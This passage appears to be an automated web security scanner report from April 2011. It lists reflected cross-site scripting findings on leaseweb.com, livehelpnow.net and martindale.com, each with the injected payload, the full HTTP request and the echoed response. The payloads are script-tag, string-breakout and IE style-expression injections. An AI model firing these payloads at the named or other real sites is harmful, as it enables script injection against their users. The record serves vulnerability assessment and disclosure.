Connection: keep-alive
Referer: https://www.leaseweb.com/en/shopping-cart
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133; goBack=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:54:24 GMT
Server: Apache
Status: 404 Not Found
Set-Cookie: goBack=0; path=/
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 13918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/shopping-cart/login8fcd8"><script>alert(1)</script>8190e06220">
...[SNIP]...

4.107. https://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.leaseweb.com
Path:   /images/lsw2/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c4b9"><script>alert(1)</script>82707070b8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images7c4b9"><script>alert(1)</script>82707070b8a/lsw2/favicon.ico HTTP/1.1
Host: www.leaseweb.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133; goBack=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:39:31 GMT
Server: Apache
Status: 404 Not Found
Set-Cookie: goBack=0; path=/
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 14057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/images7c4b9"><script>alert(1)</script>82707070b8a/lsw2/favicon.ico">
...[SNIP]...

4.108. https://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.leaseweb.com
Path:   /images/lsw2/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e94b6"><script>alert(1)</script>b002c993ba0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/lsw2e94b6"><script>alert(1)</script>b002c993ba0/favicon.ico HTTP/1.1
Host: www.leaseweb.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133; goBack=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:40:30 GMT
Server: Apache
Status: 404 Not Found
Set-Cookie: goBack=0; path=/
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 14057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/images/lsw2e94b6"><script>alert(1)</script>b002c993ba0/favicon.ico">
...[SNIP]...

4.109. https://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.leaseweb.com
Path:   /images/lsw2/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49983"><script>alert(1)</script>73bc73b149d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/lsw2/favicon.ico49983"><script>alert(1)</script>73bc73b149d HTTP/1.1
Host: www.leaseweb.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133; goBack=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:42:34 GMT
Server: Apache
Status: 404 Not Found
Set-Cookie: goBack=0; path=/
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 14059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/images/lsw2/favicon.ico49983"><script>alert(1)</script>73bc73b149d">
...[SNIP]...

4.110. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the lhnid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdc04"%3balert(1)//274d575769 was submitted in the lhnid parameter. This input was echoed as fdc04";alert(1)//274d575769 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=1288fdc04"%3balert(1)//274d575769&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/?a=bsf_product&L=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 18 Apr 2011 23:24:48 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 9873


var lhnTrack='f';
if (typeof lhnInstalled !='undefined'){lhnTrack='f'}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnline=0;
InviteRepeats=0;

function pa
...[SNIP]...
<img style='position:absolute;top:-5000px;left:-5000px;' width='1' height='1' src='https://www.livehelpnow.net/lhn/jsutil/showninvitationmessage.aspx?iplhnid=173.193.214.243|1288fdc04";alert(1)//274d575769|4/18/2011 7:24:48 PM' />
...[SNIP]...

4.111. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the lhnid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload fe467%3balert(1)//14b3eda9427 was submitted in the lhnid parameter. This input was echoed as fe467;alert(1)//14b3eda9427 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=1288fe467%3balert(1)//14b3eda9427&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/?a=bsf_product&L=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 18 Apr 2011 23:24:49 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 9873


var lhnTrack='f';
if (typeof lhnInstalled !='undefined'){lhnTrack='f'}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnline=0;
InviteRepeats=0;

function pa
...[SNIP]...
ion.protocol=='https:' || (typeof lhnJsHost !='undefined' && lhnJsHost == "https://"))
   {
       window.open('https://www.livehelpnow.net/lhn/livechatvisitor.aspx?zzwindow=' + lhnwindow + '&lhnid=' + 1288fe467;alert(1)//14b3eda9427 + '&d=' + 0,'lhnchat','left=' + wleft + ',top=' + wtop + ',width=580,height=435,toolbar=no,location=no,directories=no,status=yes,menubar=no,scrollbars=' + sScrollbars + ',copyhistory=no,resizable=yes'
...[SNIP]...

4.112. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fa7e'%3balert(1)//7293da81ede was submitted in the t parameter. This input was echoed as 9fa7e';alert(1)//7293da81ede in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=59&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f9fa7e'%3balert(1)//7293da81ede HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/?a=bsf_product&L=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 18 Apr 2011 23:25:01 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 9632


var lhnTrack='f9fa7e';alert(1)//7293da81ede';
if (typeof lhnInstalled !='undefined'){lhnTrack='f'}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnline=-1;
InviteRepeats=0;

function pausecomp(millis)
...[SNIP]...

4.113. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [zimg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the zimg request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7e4b6%3balert(1)//6935714a5ac was submitted in the zimg parameter. This input was echoed as 7e4b6;alert(1)//6935714a5ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=597e4b6%3balert(1)//6935714a5ac&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/?a=bsf_product&L=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 18 Apr 2011 23:24:46 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 9712


var lhnTrack='f';
if (typeof lhnInstalled !='undefined'){lhnTrack='f'}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnline=-1;
InviteRepeats=0;

function p
...[SNIP]...
mageserver.ashx?lhnid=" + 1288 + "&navname=" + lhnbrowser + "&java=" + lhnjava + "&referrer=" + lhnreferrer + "&pagetitle=" + lhnpagetitle + "&pageurl=" + lhnsPath + "&page=" + lhnsPage + "&zimg=" + 597e4b6;alert(1)//6935714a5ac + "&sres=" + lhnsRes + "&sdepth=" + lhnsDepth + "&flash=" + lhnflashversion + "&custom1=&custom2=&custom3=&t=" +lhnTrack + "&d=&rndstr=" + lhnrand_no + "'>
...[SNIP]...

4.114. http://www.martindale.com/Results.aspx [ft parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /Results.aspx

Issue detail

The value of the ft request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d074"style%3d"x%3aexpression(alert(1))"889001f78a5f9f252 was submitted in the ft parameter. This input was echoed as 5d074"style="x:expression(alert(1))"889001f78a5f9f252 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /Results.aspx?frm=freesearch&afs=tokyo&prr=&newr=&nr=&z=&p=10&hid=&ft=15d074"style%3d"x%3aexpression(alert(1))"889001f78a5f9f252&ns=&n=0&ne=&sh=&rpp=&c=N&dv=&ra=key&ru=%2FResults.aspx HTTP/1.1
Host: www.martindale.com
Proxy-Connection: keep-alive
Referer: http://www.martindale.com/Results.aspx?ft=1&frm=freesearch&afs=tokyo
Cache-Control: max-age=0
Origin: http://www.martindale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=8a4b394aca6c4465b5e28b687e0053f8; __utmz=205508303.1303088570.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; ASP.NET_SessionId=22d3qz553gvbwnf5ts4cfr55; mdc_session_id=04c4576600194df5acebfe5958420433; refDomain=www.martindale.com; CSStatsCookie=BrowserId=8a4b394aca6c4465b5e28b687e0053f8&SessionId=04c4576600194df5acebfe5958420433&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104181256217992090&InitialSearchId=201104181256217992090; op397mdcsearchresultsgum=a00y02z086274im05915n4274im0oc7m53321; op397mdcsearchresultsliid=a00y02z086274im05915n4274im0oc7m53321; WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1303145820203:ss=1303145727607; __utma=205508303.1292355595.1303088570.1303091957.1303145728.3; __utmc=205508303; __utmb=205508303.5.10.1303145728

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 105196
Content-Type: text/html; charset=iso-8859-1
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=8a4b394aca6c4465b5e28b687e0053f8&SessionId=04c4576600194df5acebfe5958420433&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104181303307998163&InitialSearchId=201104181303307998163; domain=.martindale.com; expires=Mon, 18-Apr-2011 17:58:57 GMT; path=/
Date: Mon, 18 Apr 2011 17:03:57 GMT
X-RE-Ref: 1 1607625934
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   attorneys, la
...[SNIP]...
<input type="hidden" id="ft" name="ft" value="15d074"style="x:expression(alert(1))"889001f78a5f9f252">
...[SNIP]...

4.115. http://www.martindale.com/Results.aspx [ft parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /Results.aspx

Issue detail

The value of the ft request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43fc8"style%3d"x%3aexpression(alert(1))"a87c929c975 was submitted in the ft parameter. This input was echoed as 43fc8"style="x:expression(alert(1))"a87c929c975 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Results.aspx?ft=143fc8"style%3d"x%3aexpression(alert(1))"a87c929c975&frm=freesearch&afs=tokyo HTTP/1.1
Host: www.martindale.com
Proxy-Connection: keep-alive
Referer: http://www.martindale.com/all/c-england/all-lawyers-10.htm?c=N
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=8a4b394aca6c4465b5e28b687e0053f8; __utmz=205508303.1303088570.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; ASP.NET_SessionId=22d3qz553gvbwnf5ts4cfr55; mdc_session_id=04c4576600194df5acebfe5958420433; refDomain=www.martindale.com; CSStatsCookie=BrowserId=8a4b394aca6c4465b5e28b687e0053f8&SessionId=04c4576600194df5acebfe5958420433&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; op397mdcsearchresultsgum=a00y02z086274im05915n4274im0p20jucbb4; op397mdcsearchresultsliid=a00y02z086274im05915n4274im0p20jucbb4; WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1303145791458:ss=1303145727607; __utma=205508303.1292355595.1303088570.1303091957.1303145728.3; __utmc=205508303; __utmb=205508303.4.10.1303145728

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 103891
Content-Type: text/html; charset=iso-8859-1
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=8a4b394aca6c4465b5e28b687e0053f8&SessionId=04c4576600194df5acebfe5958420433&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104181259087994432&InitialSearchId=201104181259087994432; domain=.martindale.com; expires=Mon, 18-Apr-2011 17:54:08 GMT; path=/
Date: Mon, 18 Apr 2011 16:59:08 GMT
X-RE-Ref: 1 1317179435
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   attorneys, la
...[SNIP]...
<input type="hidden" id="ft" name="ft" value="143fc8"style="x:expression(alert(1))"a87c929c975">
...[SNIP]...

4.116. http://www.martindale.com/Results.aspx [hid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /Results.aspx

Issue detail

The value of the hid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72516"style%3d"x%3aexpression(alert(1))"65e10972882556847 was submitted in the hid parameter. This input was echoed as 72516"style="x:expression(alert(1))"65e10972882556847 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /Results.aspx?frm=freesearch&afs=tokyo&prr=&newr=&nr=&z=&p=10&hid=72516"style%3d"x%3aexpression(alert(1))"65e10972882556847&ft=1&ns=&n=0&ne=&sh=&rpp=&c=N&dv=&ra=key&ru=%2FResults.aspx HTTP/1.1
Host: www.martindale.com
Proxy-Connection: keep-alive
Referer: http://www.martindale.com/Results.aspx?ft=1&frm=freesearch&afs=tokyo
Cache-Control: max-age=0
Origin: http://www.martindale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=8a4b394aca6c4465b5e28b687e0053f8; __utmz=205508303.1303088570.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; ASP.NET_SessionId=22d3qz553gvbwnf5ts4cfr55; mdc_session_id=04c4576600194df5acebfe5958420433; refDomain=www.martindale.com; CSStatsCookie=BrowserId=8a4b394aca6c4465b5e28b687e0053f8&SessionId=04c4576600194df5acebfe5958420433&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104181256217992090&InitialSearchId=201104181256217992090; op397mdcsearchresultsgum=a00y02z086274im05915n4274im0oc7m53321; op397mdcsearchresultsliid=a00y02z086274im05915n4274im0oc7m53321; WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1303145820203:ss=1303145727607; __utma=205508303.1292355595.1303088570.1303091957.1303145728.3; __utmc=205508303; __utmb=205508303.5.10.1303145728

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 90374
Content-Type: text/html; charset=iso-8859-1
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=8a4b394aca6c4465b5e28b687e0053f8&SessionId=04c4576600194df5acebfe5958420433&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104181302437997920&InitialSearchId=201104181302437997920; domain=.martindale.com; expires=Mon, 18-Apr-2011 17:57:44 GMT; path=/
Date: Mon, 18 Apr 2011 17:02:43 GMT
X-RE-Ref: 1 1545556562
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   attorneys, la
...[SNIP]...
<input type="hidden" id="hid" name="hid" value="72516"style="x:expression(alert(1))"65e10972882556847">
...[SNIP]...

4.117. http://www.martindale.com/Results.aspx [sh parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /Results.aspx

Issue detail

The value of the sh request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 259df"style%3d"x%3aexpression(alert(1))"db2e7570dde759634 was submitted in the sh parameter. This input was echoed as 259df"style="x:expression(alert(1))"db2e7570dde759634 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /Results.aspx?frm=freesearch&afs=tokyo&prr=&newr=&nr=&z=&p=10&hid=&ft=1&ns=&n=0&ne=&sh=259df"style%3d"x%3aexpression(alert(1))"db2e7570dde759634&rpp=&c=N&dv=&ra=key&ru=%2FResults.aspx HTTP/1.1
Host: www.martindale.com
Proxy-Connection: keep-alive
Referer: http://www.martindale.com/Results.aspx?ft=1&frm=freesearch&afs=tokyo
Cache-Control: max-age=0
Origin: http://www.martindale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=8a4b394aca6c4465b5e28b687e0053f8; __utmz=205508303.1303088570.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; ASP.NET_SessionId=22d3qz553gvbwnf5ts4cfr55; mdc_session_id=04c4576600194df5acebfe5958420433; refDomain=www.martindale.com; CSStatsCookie=BrowserId=8a4b394aca6c4465b5e28b687e0053f8&SessionId=04c4576600194df5acebfe5958420433&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104181256217992090&InitialSearchId=201104181256217992090; op397mdcsearchresultsgum=a00y02z086274im05915n4274im0oc7m53321; op397mdcsearchresultsliid=a00y02z086274im05915n4274im0oc7m53321; WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1303145820203:ss=1303145727607; __utma=205508303.1292355595.1303088570.1303091957.1303145728.3; __utmc=205508303; __utmb=205508303.5.10.1303145728

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 90386
Content-Type: text/html; charset=iso-8859-1
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=8a4b394aca6c4465b5e28b687e0053f8&SessionId=04c4576600194df5acebfe5958420433&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104181308118001985&InitialSearchId=201104181308118001985; domain=.martindale.com; expires=Mon, 18-Apr-2011 18:04:15 GMT; path=/
Date: Mon, 18 Apr 2011 17:09:15 GMT
X-RE-Ref: 1 1938278746
